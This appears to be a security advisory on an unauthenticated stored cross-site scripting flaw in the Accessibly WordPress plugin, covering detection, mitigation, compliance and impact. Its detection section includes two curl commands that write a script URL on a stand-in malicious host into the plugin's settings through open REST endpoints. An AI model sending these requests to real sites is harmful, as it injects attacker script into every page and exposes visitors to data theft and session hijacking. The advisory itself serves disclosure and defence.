Executive Summary

The Accessibly plugin for WordPress has a Stored Cross-Site Scripting (XSS) vulnerability via its REST API in all versions up to and including 3.0.3.

The plugin exposes REST API endpoints that do not require any authentication or authorization, allowing anyone to send data.

Specifically, the plugin accepts user-supplied JSON data and saves it directly into the WordPress options table without sanitization or validation.

This stored data is later used to inject a script tag on every front-end page, enabling attackers to inject arbitrary JavaScript that executes for all site visitors.

Useful 0 Not Useful 0

Detection Guidance

This vulnerability can be detected by checking if the vulnerable Accessibly plugin version (up to 3.0.3) is installed and by inspecting the WordPress REST API endpoints `/otm-ac/v1/update-widget-options` and `/otm-ac/v1/update-app-config` for unauthorized access.

Since the endpoints have no authentication, you can test them by sending crafted JSON payloads to these endpoints to see if the `widgetSrc` option can be updated without authentication.

Example commands using curl to test the endpoints might be:

• curl -X POST https://yourwordpresssite.com/wp-json/otm-ac/v1/update-widget-options -d '{"widgetSrc":"http://malicious.example.com/script.js"}' -H "Content-Type: application/json"
• curl -X POST https://yourwordpresssite.com/wp-json/otm-ac/v1/update-app-config -d '{"widgetSrc":"http://malicious.example.com/script.js"}' -H "Content-Type: application/json"

Additionally, you can check the WordPress options table for the `widgetSrc` value to see if it points to an unexpected or malicious external script.

Useful 0 Not Useful 0

Mitigation Strategies

Immediate mitigation steps include:

• Update the Accessibly plugin to a version later than 3.0.3 where this vulnerability is fixed.
• If an update is not immediately possible, restrict access to the vulnerable REST API endpoints by implementing authentication or firewall rules to block unauthenticated requests to `/wp-json/otm-ac/v1/update-widget-options` and `/wp-json/otm-ac/v1/update-app-config`.
• Manually inspect and clean the `widgetSrc` option in the WordPress options table to remove any malicious script URLs.
• Monitor your site for suspicious JavaScript execution or unexpected external script loads.

Useful 0 Not Useful 0

Compliance Impact

The vulnerability allows unauthenticated attackers to inject arbitrary JavaScript into all front-end pages of a WordPress site using the Accessibly plugin. This could lead to unauthorized access to user data or manipulation of site content.

Such unauthorized script injection can compromise the confidentiality and integrity of user data, potentially violating data protection requirements under standards like GDPR and HIPAA.

Specifically, the lack of authentication and validation in the REST API endpoints could allow attackers to exfiltrate personal data or perform actions on behalf of users without consent, which conflicts with compliance obligations for protecting sensitive information.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability allows unauthenticated attackers to inject malicious JavaScript into a WordPress site using the Accessibly plugin.

The injected script runs on every page viewed by site visitors, potentially leading to theft of user data, session hijacking, defacement, or distribution of malware.

Because the attack requires no authentication, it can be exploited by anyone, increasing the risk and impact.

Useful 0 Not Useful 0